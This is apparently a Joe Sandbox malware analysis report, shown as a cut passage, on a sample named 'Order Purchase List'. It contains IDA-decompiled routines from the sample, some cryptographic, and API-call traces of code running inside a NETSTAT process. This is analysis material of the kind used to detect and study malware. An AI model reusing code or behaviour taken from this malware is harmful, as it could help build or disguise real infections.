                                      				if( *_t28 >= 0) {
                                      					 *_t169 =  *_t169 + _t141;
                                      				}
                                      				 *_t104 =  *_t104 + _t104;
                                      				 *_t104 =  *_t104 & _t104;
                                      				_t105 = _t104 |  *(_t104 + 0xa04df04);
                                      				 *((intOrPtr*)(_t179 + 0x32)) =  *((intOrPtr*)(_t179 + 0x32)) + _t105;
                                      				 *_t105 =  *_t105 + _t105;
                                      				 *_t105 =  *_t105 + _t105;
                                      				_t143 = _t141 + 2;
                                      				_t186 = _t185 |  *(_t185 + 0xb04e600);
                                      				 *((intOrPtr*)(_t179 + _t186)) =  *((intOrPtr*)(_t179 + _t186)) + _t169;
                                      				 *_t105 =  *_t105 + _t105;
                                      				 *((intOrPtr*)(_t143 + 0xb)) =  *((intOrPtr*)(_t143 + 0xb)) + _t105;
                                      				asm("rol dword [eax], 0xec");
                                      				_t106 = _t105 + 0xb;
                                      				 *((intOrPtr*)(_t190 + 0x32)) =  *((intOrPtr*)(_t190 + 0x32)) + _t179;
                                      				 *_t106 =  *_t106 + _t106;
                                      				 *_t106 =  *_t106 + _t106;
                                      				_t144 = _t143 + 1;
                                      				asm("out 0x4, al");
                                      				_pop(_t183);
                                      				_t108 = _t106 ^  *_t106;
                                      				 *_t108 =  *_t108 + _t108;
                                      				 *((intOrPtr*)(_t144 + 0xb)) =  *((intOrPtr*)(_t144 + 0xb)) + _t108;
                                      				asm("outsb");
                                      				_t170 = _t169 + _t108;
                                      				_t109 = _t108 + 0xc;
                                      				 *((intOrPtr*)(_t109 + 0x32)) =  *((intOrPtr*)(_t109 + 0x32)) + _t170;
                                      				 *_t109 =  *_t109 + _t109;
                                      				 *_t109 =  *_t109 + _t109;
                                      				_t110 = _t109 + 0xd;
                                      				 *((intOrPtr*)(_t179 + 0x32)) =  *((intOrPtr*)(_t179 + 0x32)) + _t179;
                                      				 *_t110 =  *_t110 + _t110;
                                      				 *_t110 =  *_t110 & _t110;
                                      				_t147 = _t144 + 1 + _t179 + 1;
                                      				_t180 = _t179 | _t183;
                                      				_t172 = (_t170 | _t194 |  *(_t144 + 2)) + _t147;
                                      				_t111 = _t110 + 0xd;
                                      				 *((intOrPtr*)(_t147 + 0x32)) =  *((intOrPtr*)(_t147 + 0x32)) + _t147;
                                      				 *_t111 =  *_t111 + _t111;
                                      				 *_t111 =  *_t111 + _t111;
                                      				 *_t111 =  *_t111 + _t111;
                                      				_t112 = _t111 + 0x3285000e;
                                      				 *_t112 =  *_t112 + _t112;
                                      				 *_t112 =  *_t112 & _t112;
                                      				_t187 = _t186 | _t180;
                                      				 *_t187 =  *_t187 + _t112;
                                      				_t113 = _t112 + 0x328e000e;
                                      				 *_t113 =  *_t113 + _t113;
                                      				 *_t113 =  *_t113 + _t113;
                                      				_t151 = _t147 + 3 |  *(_t113 + _t113 + 0xf050d);
                                      				_t115 = _t113 ^  *_t113;
                                      				 *_t115 =  *_t115 + _t115;
                                      				 *((intOrPtr*)(_t151 + 0xb)) =  *((intOrPtr*)(_t151 + 0xb)) + _t115;
                                      				 *((intOrPtr*)(_t172 + 0x32)) =  *((intOrPtr*)(_t172 + 0x32)) + _t115;
                                      				 *((intOrPtr*)(_t151 + 0xb)) =  *((intOrPtr*)(_t151 + 0xb)) + _t115;
                                      				_t116 = _t115 ^  *_t115;
                                      				 *_t116 =  *_t116 + _t116;
                                      				 *((intOrPtr*)(_t151 + 0xb)) =  *((intOrPtr*)(_t151 + 0xb)) + _t116;
                                      				_push(_t187);
                                      				_t181 = _t180 +  *_t151;
                                      				_t117 = _t116 + 0x32b40010;
                                      				 *_t117 =  *_t117 + _t117;
                                      				 *_t117 =  *_t117 + _t117;
                                      				_t152 = 1 + _t151;
                                      				_t175 = _t172 - 0x00000001 +  *0xab001005 |  *(_t152 + _t117 + 0xd);
                                      				_t118 = _t117 + 0x32be0011;
                                      				 *_t118 =  *_t118 + _t118;
                                      				 *_t118 =  *_t118 & _t118;
                                      				asm("adc eax, [0x32c70011]");
                                      				 *_t118 =  *_t118 + _t118;
                                      				 *_t118 =  *_t118 + _t118;
                                      				_t155 = 1 + (_t152 + 0x00000001 |  *(_t175 + 3));
                                      				_t121 = (_t118 |  *(_t118 + 4) | 0xd1001205) ^  *(_t118 |  *(_t118 + 4) | 0xd1001205);
                                      				 *_t121 =  *_t121 + _t121;
                                      				 *((intOrPtr*)(_t155 + 0xb)) =  *((intOrPtr*)(_t155 + 0xb)) + _t121;
                                      				_t123 = _t121 + 0x32da0025;
                                      				 *_t123 =  *_t123 + _t123;
                                      				 *_t123 =  *_t123 + _t123;
                                      				_t125 = _t123 + 0x32e40020;
                                      				 *_t125 =  *_t125 + _t125;
                                      				 *_t125 =  *_t125 & _t125;
                                      				_t127 = _t125 + 0x32ed0026;
                                      				 *_t127 =  *_t127 + _t127;
                                      				 *_t127 =  *_t127 + _t127;
                                      				_t128 = _t127 |  *(_t181 + 1);
                                      				asm("sbb al, [0x32f80014]");
                                      				 *_t128 =  *_t128 + _t128;
                                      				 *_t128 =  *_t128 & _t128;
                                      				_t176 = _t175 |  *(1 + (_t187 | _t125));
                                      				 *0x333b0014 =  *0x333b0014 & _t128;
                                      				 *_t128 =  *_t128 + _t128;
                                      				 *_t128 =  *_t128 + _t128;
                                      				asm("daa");
                                      				_t129 = _t128 + 0x33450015;
                                      				 *_t129 =  *_t129 + _t129;
                                      				 *_t129 =  *_t129 & _t129;
                                      				_t162 = 1 + (_t155 + 5 |  *(_t181 + 1));
                                      				_t131 = _t129 - 0x4e001505 ^  *(_t129 - 0x4e001505);
                                      				 *_t131 =  *_t131 + _t131;
                                      				 *((intOrPtr*)(_t162 + 0xb)) =  *((intOrPtr*)(_t162 + 0xb)) + _t131;
                                      				asm("lodsd");
                                      				_t133 = _t131 +  *_t183 + 0x33580016;
                                      				 *_t133 =  *_t133 + _t133;
                                      				 *_t133 =  *_t133 & _t133;
                                      				 *((intOrPtr*)(_t176 + 0x33)) =  *((intOrPtr*)(_t176 + 0x33)) + _t133;
                                      				 *_t133 =  *_t133 + _t133;
                                      				 *_t133 =  *_t133 + _t133;
                                      				_t164 = _t162 + 2;
                                      				 *((intOrPtr*)(_t164 + 0x33)) =  *((intOrPtr*)(_t164 + 0x33)) + _t176;
                                      				 *_t133 =  *_t133 + _t133;
                                      				 *_t133 =  *_t133 & _t133;
                                      				_t165 = _t164 + 1;
                                      				_t135 = (_t133 | _t176) ^  *(_t133 | _t176);
                                      				 *_t135 =  *_t135 + _t135;
                                      				 *((intOrPtr*)(_t165 + 0xb)) =  *((intOrPtr*)(_t164 + 0xc)) + _t135;
                                      				_t137 = _t135 + 0x33800018;
                                      				 *_t137 =  *_t137 + _t137;
                                      				 *_t137 =  *_t137 & _t137;
                                      				return _t137;
                                      			}

                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396059881.00000000009F2000.00000002.00020000.sdmp, Offset: 009F0000, based on PE: true
                                      • Associated: 0000000A.00000002.396048157.00000000009F0000.00000002.00020000.sdmp
                                      • Associated: 0000000A.00000002.396181453.0000000000B00000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_9f0000_Order Purchase List.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ff99962d93dbb76bf86a8927adda7a5537db0c7c941e3cfd538f1c5c05d29ae1
                                      • Instruction ID: 490b48f5a00ce7d02c26bd60175cb43ab5cc778e07a971ef604cd87e88dd24ce
                                      • Opcode Fuzzy Hash: ff99962d93dbb76bf86a8927adda7a5537db0c7c941e3cfd538f1c5c05d29ae1
                                      • Instruction Fuzzy Hash: DDC1E1A680E3C05FD7578B748DB55917FB0AE2720070E86EBC4C5CF4A3E118A91AD763
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                      				signed int _t66;
                                      				signed int* _t69;
                                      				signed int* _t81;
                                      				signed int _t94;
                                      				signed int _t96;
                                      				signed int _t106;
                                      				signed int _t108;
                                      				signed int* _t110;
                                      				signed int _t127;
                                      				signed int _t129;
                                      				signed int _t133;
                                      				signed int _t152;
                                      				intOrPtr _t171;
                                      
                                      				_t81 = _a12;
                                      				_t110 = _a8;
                                      				asm("ror esi, 0x8");
                                      				asm("rol eax, 0x8");
                                      				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                      				_t66 =  &(_t110[1]);
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                      				asm("ror esi, 0x8");
                                      				asm("rol ecx, 0x8");
                                      				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                      				if(_a16 != 0x100) {
                                      					L4:
                                      					return _t66 | 0xffffffff;
                                      				} else {
                                      					_t171 = _a4;
                                      					_t69 = 0;
                                      					_a12 = 0;
                                      					while(1) {
                                      						_t152 =  *(_t66 + 0x18);
                                      						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                      						_t127 =  *_t66 ^ _t94;
                                      						 *(_t66 + 0x1c) = _t94;
                                      						_t96 =  *(_t66 + 4) ^ _t127;
                                      						 *(_t66 + 0x20) = _t127;
                                      						_t129 =  *(_t66 + 8) ^ _t96;
                                      						 *(_t66 + 0x24) = _t96;
                                      						 *(_t66 + 0x28) = _t129;
                                      						if(_t69 == 6) {
                                      							break;
                                      						}
                                      						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                      						_t133 =  *(_t66 + 0x10) ^ _t106;
                                      						 *(_t66 + 0x2c) = _t106;
                                      						_t108 =  *(_t66 + 0x14) ^ _t133;
                                      						 *(_t66 + 0x34) = _t108;
                                      						_t69 =  &(_a12[0]);
                                      						 *(_t66 + 0x30) = _t133;
                                      						 *(_t66 + 0x38) = _t108 ^ _t152;
                                      						_t66 = _t66 + 0x20;
                                      						_a12 = _t69;
                                      						if(_t69 < 7) {
                                      							continue;
                                      						} else {
                                      							goto L4;
                                      						}
                                      						goto L6;
                                      					}
                                      					return 0xe;
                                      				}
                                      				L6:
                                      			}

                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                      • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                      • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                      • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 62%
                                      			E00402D87(signed int* __edi, signed int* _a4, signed int* _a8, intOrPtr _a12) {
                                      				signed int _t67;
                                      				signed int _t70;
                                      				intOrPtr _t72;
                                      				signed int* _t85;
                                      				signed int _t98;
                                      				signed int _t100;
                                      				signed int _t110;
                                      				signed int _t112;
                                      				signed int* _t114;
                                      				signed int _t131;
                                      				signed int _t133;
                                      				signed int _t137;
                                      				signed int _t158;
                                      				signed int* _t180;
                                      
                                      				_push(ds);
                                      				asm("salc");
                                      				_t70 =  *__edi * 0x8bec8b55;
                                      				_t85 = _a8;
                                      				_t114 = _a4;
                                      				_push(_t70);
                                      				_push(__edi);
                                      				asm("ror esi, 0x8");
                                      				asm("rol eax, 0x8");
                                      				 *_t114 =  *_t85 & 0xff00ff00 |  *_t85 & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t114[1] = _t85[1] & 0xff00ff00 | _t85[1] & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t114[2] = _t85[2] & 0xff00ff00 | _t85[2] & 0x00ff00ff;
                                      				_t67 =  &(_t114[1]);
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t114[3] = _t85[3] & 0xff00ff00 | _t85[3] & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t114[4] = _t85[4] & 0xff00ff00 | _t85[4] & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t114[5] = _t85[5] & 0xff00ff00 | _t85[5] & 0x00ff00ff;
                                      				asm("ror edi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_t114[6] = _t85[6] & 0xff00ff00 | _t85[6] & 0x00ff00ff;
                                      				asm("ror esi, 0x8");
                                      				asm("rol ecx, 0x8");
                                      				_t114[7] = _t85[7] & 0xff00ff00 | _t85[7] & 0x00ff00ff;
                                      				if(_a12 != 0x100) {
                                      					L5:
                                      					return _t67 | 0xffffffff;
                                      				} else {
                                      					_t180 = _a4;
                                      					_t72 = 0;
                                      					_a12 = 0;
                                      					while(1) {
                                      						_t158 =  *(_t67 + 0x18);
                                      						_t98 = ( *(_t180 + 4 + (_t158 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t180 + _t72 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t180 + 4 + (_t158 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 5 + (_t158 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t180 + 4 + (_t158 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t67 - 4);
                                      						_t131 =  *_t67 ^ _t98;
                                      						 *(_t67 + 0x1c) = _t98;
                                      						_t100 =  *(_t67 + 4) ^ _t131;
                                      						 *(_t67 + 0x20) = _t131;
                                      						_t133 =  *(_t67 + 8) ^ _t100;
                                      						 *(_t67 + 0x24) = _t100;
                                      						 *(_t67 + 0x28) = _t133;
                                      						if(_t72 == 6) {
                                      							break;
                                      						}
                                      						_t110 = ( *(_t180 + 4 + (_t133 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t180 + 4 + (_t133 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 4 + (_t133 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t180 + 5 + (_t133 & 0x000000ff) * 4) & 0x000000ff ^  *(_t67 + 0xc);
                                      						_t137 =  *(_t67 + 0x10) ^ _t110;
                                      						 *(_t67 + 0x2c) = _t110;
                                      						_t112 =  *(_t67 + 0x14) ^ _t137;
                                      						 *(_t67 + 0x34) = _t112;
                                      						_t72 = _a12 + 1;
                                      						 *(_t67 + 0x30) = _t137;
                                      						 *(_t67 + 0x38) = _t112 ^ _t158;
                                      						_t67 = _t67 + 0x20;
                                      						_a12 = _t72;
                                      						if(_t72 < 7) {
                                      							continue;
                                      						} else {
                                      							goto L5;
                                      						}
                                      						goto L7;
                                      					}
                                      					return 0xe;
                                      				}
                                      				L7:
                                      			}

                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • Opcode ID: a50954314b6cbbb752146166c75368b6fa30f512ff175ded48fbf907d0de8446
                                      • Instruction ID: 1a13d89bf5bb1846c0edc9fa13631d371e3cec2800407f547806a5c5019889a2
                                      • Opcode Fuzzy Hash: a50954314b6cbbb752146166c75368b6fa30f512ff175ded48fbf907d0de8446
                                      • Instruction Fuzzy Hash: 8551B4B3E54A214BD318CF09CD40631B692FFC8312B5F81BEDD199B397CE74A9529A90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00401030(signed char* __eax) {
                                      				signed char* _t37;
                                      				unsigned int _t65;
                                      				unsigned int _t73;
                                      				unsigned int _t81;
                                      				unsigned int _t88;
                                      				signed char _t94;
                                      				signed char _t97;
                                      				signed char _t100;
                                      
                                      				_t37 = __eax;
                                      				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                      				_t94 = __eax[0xb];
                                      				if((_t94 & 0x00000001) != 0) {
                                      					_t65 = _t65 | 0x80000000;
                                      				}
                                      				_t37[0xc] = _t65 >> 0x18;
                                      				_t37[0xf] = _t65;
                                      				_t37[0xd] = _t65 >> 0x10;
                                      				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                                      				_t97 = _t37[7];
                                      				_t37[0xe] = _t65 >> 8;
                                      				if((_t97 & 0x00000001) != 0) {
                                      					_t73 = _t73 | 0x80000000;
                                      				}
                                      				_t37[8] = _t73 >> 0x18;
                                      				_t37[0xb] = _t73;
                                      				_t37[9] = _t73 >> 0x10;
                                      				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                                      				_t100 = _t37[3];
                                      				_t37[0xa] = _t73 >> 8;
                                      				if((_t100 & 0x00000001) != 0) {
                                      					_t81 = _t81 | 0x80000000;
                                      				}
                                      				_t37[4] = _t81 >> 0x18;
                                      				_t37[7] = _t81;
                                      				_t37[5] = _t81 >> 0x10;
                                      				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                                      				 *_t37 = _t88 >> 0x18;
                                      				_t37[1] = _t88 >> 0x10;
                                      				_t37[6] = _t81 >> 8;
                                      				_t37[2] = _t88 >> 8;
                                      				_t37[3] = _t88;
                                      				return _t37;
                                      			}












                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                      • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                      • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                      • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004162ED(signed int __eax, void* __ecx, void* __edi) {
                                      
                                      				return (__eax ^ 0x000000f1) + 0xc6;
                                      			}




                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • Opcode ID: c6260832c20befb554ee63aabac620c59c5f03286517c4aaf3fbd916f67317ff
                                      • Instruction ID: 30a90647132be9fa7f3c5124488fac858ce60e329e10de007bea9b208d39e9f1
                                      • Opcode Fuzzy Hash: c6260832c20befb554ee63aabac620c59c5f03286517c4aaf3fbd916f67317ff
                                      • Instruction Fuzzy Hash: 18B09B63E610441549245D8574450B5F365D797137F4132E6EE0CE34006906946349DD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E00415852(void* __eax, void* __edx) {
                                      
                                      				asm("cld");
                                      				asm("sbb al, 0x7c");
                                      				return __eax;
                                      			}




                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • Opcode ID: f4c22b02bdc5548bbd68fd2fa2066c37c4dc2de67460857279b9c2ce96134e1b
                                      • Instruction ID: a5532c49f01742ea4cc80d405c60fa1799a97be4c2a32a1ff3407ef2c3192bc2
                                      • Opcode Fuzzy Hash: f4c22b02bdc5548bbd68fd2fa2066c37c4dc2de67460857279b9c2ce96134e1b
                                      • Instruction Fuzzy Hash: DEA0012BE99028049A5498BAB8800B5D324E2EB6BA83076A3E68AB78010216C41F416D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:5.4%
                                      Dynamic/Decrypted Code Coverage:1.9%
                                      Signature Coverage:0%
                                      Total number of Nodes:738
                                      Total number of Limit Nodes:84

                                      Graph

32004 2af4083 32005 2b0a030 2 API calls 32004->32005 32006 2af4110 32005->32006 32007 2b0a030 2 API calls 32006->32007 32009 2af412a 32007->32009 32008 2af42a6 32008->31942 32009->32008 32010 2af9ea0 LdrLoadDll 32009->32010 32011 2af416a 32010->32011 32012 2af9d70 LdrLoadDll 32011->32012 32013 2af420a 32012->32013 32013->31942 32015 2b03e60 LdrLoadDll 32014->32015 32016 2b07461 32015->32016 32017 2b07487 32016->32017 32018 2b07474 CreateThread 32016->32018 32017->31938 32018->31938 32020 2afa187 32019->32020 32021 2af9ea0 LdrLoadDll 32020->32021 32022 2afa1c3 32021->32022 32022->31980 32024 2af9ea0 LdrLoadDll 32023->32024 32025 2afa2e9 32024->32025 32025->31982 32026->31989 32028 2b0a30d 32027->32028 32029 2b03e60 LdrLoadDll 32028->32029 32030 2b0a320 32029->32030 32030->31996 32032 2afb435 32031->32032 32040 2b08320 32032->32040 32035 2b083b0 32036 2b091f0 LdrLoadDll 32035->32036 32037 2b083cc 32036->32037 32046 2ea9650 LdrInitializeThunk 32037->32046 32038 2b083eb 32038->32004 32041 2b091f0 LdrLoadDll 32040->32041 32042 2b0833c 32041->32042 32045 2ea96d0 LdrInitializeThunk 32042->32045 32043 2af405c 32043->32004 32043->32035 32045->32043 32046->32038 32047->31952 32049 2b091f0 LdrLoadDll 32048->32049 32050 2b0813c 32049->32050 32053 2ea9840 LdrInitializeThunk 32050->32053 32051 2afd41e 32051->31745 32053->32051

                                      Executed Functions

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 392 2b085ea-2b08606 393 2b0860c-2b08641 NtCreateFile 392->393 394 2b08607 call 2b091f0 392->394 394->393
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02B03BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B03BC7,007A002E,00000000,00000060,00000000,00000000), ref: 02B0863D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02B03BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B03BC7,007A002E,00000000,00000060,00000000,00000000), ref: 02B0863D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(02B03D82,5E972F65,FFFFFFFF,02B03A41,?,?,02B03D82,?,02B03A41,FFFFFFFF,5E972F65,02B03D82,?,00000000), ref: 02B086E5
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02AF2D11,00002000,00003000,00000004), ref: 02B08809
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02AF2D11,00002000,00003000,00000004), ref: 02B08809
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(02B03D60,?,?,02B03D60,00000000,FFFFFFFF), ref: 02B08745
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(02B03D60,?,?,02B03D60,00000000,FFFFFFFF), ref: 02B08745
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
